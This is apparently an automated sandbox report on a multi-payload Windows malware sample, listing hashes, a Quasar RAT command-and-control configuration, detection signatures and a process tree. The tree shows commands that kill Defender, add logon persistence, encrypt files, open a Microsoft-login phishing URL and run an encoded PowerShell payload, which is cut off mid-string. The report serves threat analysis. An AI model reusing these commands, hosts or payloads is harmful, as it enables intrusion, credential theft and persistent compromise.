Analysis
-
max time kernel
152s -
max time network
165s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
-
submitted
30-05-2024 02:05
General
-
Target
vir.exe
-
Size
336.1MB
-
MD5
bc82ea785da1180a8a964b3e54ad106c
-
SHA1
4c1952ce778455af8ed10dca7b9f77d7815e8d0a
-
SHA256
c283ed662a29c18b117ba63ac41cca356934c6a29a1eb66e30d8305637e3411b
-
SHA512
62bf34d75e913a47185664a34555678d0b8c2cf03c9e922b0bdcb085713322bafba2bf396b43a4cda7e0be6d315aea027bba29c628fe561d01e3026b4e0b405b
-
SSDEEP
6291456:72qVJw+odBeWFv1k4R4b0ewZkhT4ofHwJjvZDQPf2tLSkHZdHVeVF0oJ:yr+WeSWgfecGT4RjvqP85/A33
Malware Config
Extracted
quasar
1.4.1
romka
jozzu420-51305.portmap.host:51305
0445c342-b551-411c-9b80-cd437437f491
-
encryption_key
E1BF1D99459F04CAF668F054744BC2C514B0A3D6
-
install_name
Romilyaa.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Windows 10 Boot
-
subdirectory
SubDir
Signatures
-
Detect Umbral payload 1 IoCs
-
Modifies firewall policy service 2 TTPs 1 IoCs
-
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar payload 2 IoCs
-
UAC bypass 3 TTPs 1 IoCs
-
Umbral
Umbral stealer is an opensource moduler stealer written in C#.
-
Windows security bypass 2 TTPs 3 IoCs
-
njRAT/Bladabindi
Widely used RAT written in .NET.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
-
Blocklisted process makes network request 4 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell and hide display window.
-
Downloads MZ/PE file
-
Manipulates Digital Signatures 1 TTPs 2 IoCs
Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.
-
.NET Reactor proctector 35 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 7 IoCs
-
Executes dropped EXE 21 IoCs
-
Loads dropped DLL 6 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 3 IoCs
Detects Themida, an advanced Windows software protection system.
-
UPX packed file 3 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Windows security modification 2 TTPs 1 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Drops Chrome extension 2 IoCs
-
Drops desktop.ini file(s) 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
-
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
-
Drops file in System32 directory 35 IoCs
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Program Files directory 34 IoCs
-
Drops file in Windows directory 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Enumerates system info in registry 2 TTPs 16 IoCs
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
-
Kills process with taskkill 4 IoCs
-
Modifies Internet Explorer settings 1 TTPs 64 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 9 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 15 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 56 IoCs
-
Suspicious use of SendNotifyMessage 53 IoCs
-
Suspicious use of SetWindowsHookEx 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\vir.exe"C:\Users\Admin\AppData\Local\Temp\vir.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\a826bb01-5af3-4898-831a-8b07bed3d518\ProgressBarSplash.exe"C:\Users\Admin\AppData\Local\Temp\a826bb01-5af3-4898-831a-8b07bed3d518\ProgressBarSplash.exe" -unpacking2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\!main.cmd" "2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K spread.cmd3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\xcopy.exexcopy 1 C:\Users\Admin\Desktop4⤵
- Enumerates system info in registry
-
C:\Windows\SysWOW64\xcopy.exexcopy 2 C:\Users\Admin\Desktop4⤵
- Enumerates system info in registry
-
C:\Windows\SysWOW64\xcopy.exexcopy 3 C:\Users\Admin\4⤵
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K doxx.cmd3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\ipconfig.exeipconfig4⤵
- Gathers network information
-
C:\Windows\SysWOW64\net.exenet accounts4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts5⤵
-
C:\Windows\SysWOW64\net.exenet user4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /apps /v /fo table4⤵
- Enumerates processes with tasklist
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\PING.EXEping google.com -t -n 1 -s 4 -43⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im WindowsDefender.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K handler.cmd3⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://https-login--microsoftonline--com.httpsproxy.net/common/reprocess?ctx=rQQIARAAhZI7b9tmFED1sOUH2tpIi6IBOjhFh6IppU98SgYykCZDSRZJW3xY5CKQFCU-RVokRZFjl2RMlg4BshToYrRA0S5FG7SZPRhBhg7JP_AQFB0Kb42SzEaWi3twz3bP9iZeR9A6qIOvq3Ad7H-JEjiGopgBIbCJQ2jbAFALsXCoOW4jqxNM4KY-v7G9i-78f4He2iD_ePzfk3vPf5TPynt2kkTxfqORZVk9nEwc06qbYdDw9dnYmU0X8G_l8rNy-VFl3ZpBsnhWiXGkhcJNFGmBFsDaTQKH65zb8wRJbWoBk_Cul_M5AHwxsPvSNOfoaaIGXUyVGJSXNFujuaXA9hy1kFcOmXC02VRXPif5K98PBLabqK5XaPQxrAWaL9Ac9qKyI5BpYsNvRjh3CuvfytYknAejKIyTR9XvKoGro8xdDerJTJDKBVpkA3HQQxkptBTACrQWELhCGxZNePmSF8BEyn3F7rQ0KOCXrLqQj6kxnlMCCVEpaaUDKj_tKzOJ6BkeTSnDUetQtPsTxE1OTN1gjcg-POpSQ4ykAsZkMX45UsQCCU_5JZeTkD8vIN1dmrSWGJno6EfQMmMD21UOID81JddwLSocRJMoPvRswVPmTtA9WQCP46dSMHdka44OOUk7SY_jTFmQTCcba0LsQDMePZ0NxU6XUJnIwMBowJLNaS_MME4FqLhoH6Xs8YA2AacL_QwLs7PqzWveu4B_qdZWSxDOzqtEGFkzZ7wXzcOJ41vXJbGAG8Jb6oSBVSd9_9la-XLt083a7heflfZKX30CqvubK6q-oau18vfrq-Ie_nr558W3Nw9-euJ-_vCELZ2vN1zR6cSnlNVQ1Wnum32xKJZ3Va7X16c8OwAm65q9NB22iNvynfZ-80Gt_KBWO69tdekRz0j4CPxTq93fKP2-9d52X3zw8fZ26oz80NR9K77xruGnH5auPnr5198XPzy-_6pzufONeVuOnDFsZIJCTaX2kJOLlCQbrkCQzpF0wCBa4VHDIkTG8Z2fd0uvAQ23⤵
- Manipulates Digital Signatures
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc196846f8,0x7ffc19684708,0x7ffc196847184⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1456,7510447828210580308,10339965672268281839,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:24⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1456,7510447828210580308,10339965672268281839,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1456,7510447828210580308,10339965672268281839,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2692 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1456,7510447828210580308,10339965672268281839,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1456,7510447828210580308,10339965672268281839,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1456,7510447828210580308,10339965672268281839,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4480 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1456,7510447828210580308,10339965672268281839,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4880 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1456,7510447828210580308,10339965672268281839,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5148 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1456,7510447828210580308,10339965672268281839,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5752 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1456,7510447828210580308,10339965672268281839,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5780 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1456,7510447828210580308,10339965672268281839,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5124 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1456,7510447828210580308,10339965672268281839,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5124 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1456,7510447828210580308,10339965672268281839,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1976 /prefetch:24⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K cipher.cmd3⤵
-
C:\Windows\SysWOW64\cipher.execipher /e4⤵
-
C:\Windows\SysWOW64\cipher.execipher /e4⤵
-
C:\Windows\SysWOW64\cipher.execipher /e4⤵
-
C:\Windows\SysWOW64\cipher.execipher /e4⤵
-
C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\Rover.exeRover.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\web.htm3⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc196846f8,0x7ffc19684708,0x7ffc196847184⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1532,12456248177934986160,17587637902308256508,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\Google.exeGoogle.exe3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\helper.vbs"3⤵
-
C:\Windows\SysWOW64\PING.EXEping google.com -t -n 1 -s 4 -43⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\PING.EXEping mrbeast.codes -t -n 1 -s 4 -43⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\xcopy.exexcopy Google.exe C:\Users\Admin\Desktop3⤵
- Enumerates system info in registry
-
C:\Windows\SysWOW64\xcopy.exexcopy Rover.exe C:\Users\Admin\Desktop3⤵
- Enumerates system info in registry
-
C:\Windows\SysWOW64\xcopy.exexcopy spinner.gif C:\Users\Admin\Desktop3⤵
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K bloatware.cmd3⤵
- Checks computer location settings
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\bloatware\1.exe1.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\bloatware\3.exe3.exe4⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5972 -s 18085⤵
- Program crash
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\bloatware\2.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}4⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K SilentSetup.cmd4⤵
-
C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exeWinaeroTweaker-1.40.0.0-setup.exe /SP- /VERYSILENT5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-A88B5.tmp\WinaeroTweaker-1.40.0.0-setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-A88B5.tmp\WinaeroTweaker-1.40.0.0-setup.tmp" /SL5="$2037E,2180794,169984,C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe" /SP- /VERYSILENT6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweaker.exe /f7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im winaerotweaker.exe /f8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweakerhelper.exe /f7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im winaerotweakerhelper.exe /f8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\regmess.exeregmess.exe3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\regmess_50462145-13a0-4e03-b9ff-609c85837d16\regmess.bat" "4⤵
-
C:\Windows\SysWOW64\reg.exereg import Setup.reg /reg:325⤵
-
C:\Windows\SysWOW64\reg.exereg import Console.reg /reg:325⤵
-
C:\Windows\SysWOW64\reg.exereg import Desktop.reg /reg:325⤵
- Sets desktop wallpaper using registry
-
C:\Windows\SysWOW64\reg.exereg import International.reg /reg:325⤵
-
C:\Windows\SysWOW64\reg.exereg import Fonts.reg /reg:325⤵
- Modifies Internet Explorer settings
-
C:\Windows\SysWOW64\reg.exereg import Cursors.reg /reg:325⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 103⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\scary.exescary.exe3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f5⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\the.exethe.exe3⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEQAOAAsACAAMAB4ADIARgAsACAAMAB4ADEARgAsACAAMAB4ADYAQwAsACAAMAB4ADQARQAsACAAMAB4ADgAOAAsACAAMAB4ADQANQAsACAAMAB4AEQARAAsACAAMAB4ADEAQQAsACAAMAB4AEUARAAsACAAMAB4ADUAQwAsACAAMAB4ADQAQgAsACAAMAB4ADQAOQAsACAAMAB4ADQAOQAsACAAMAB4ADAAQwAsACAAMAB4ADMAQgAsACAAMAB4AEYAQQAsACAAMAB4AEEAMQAsACAAMAB4ADIANwAsACAAMAB4ADMARAAsACAAMAB4ADIAQQAsACAAMAB4AEIANQAsACAAMAB4AEMARAAsACAAMAB4ADIANwAsACAAMAB4ADQARAAsACAAMAB4ADAAQQAsACAAMAB4ADUAOQAsACAAMAB4ADUANwAsACAAMAB4AEMAQQAsACAAMAB4ADcAMAAsACAAMAB4AEEAQQAsACAAMAB4AEMAQgApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAxAEMALAAgADAAeABBADMALAAgADAAeAAzADQALAAgADAAeABBADYALAAgADAAeAA4ADQALAAgADAAeABDAEMALAAgADAAeABBAEEALAAgADAAeABEADIALAAgADAAeABCADAALAAgADAAeABFAEUALAAgADAAeABBAEMALAAgADAAeABEADcALAAgADAAeABFAEIALAAgADAAeABGAEUALAAgADAAeAA4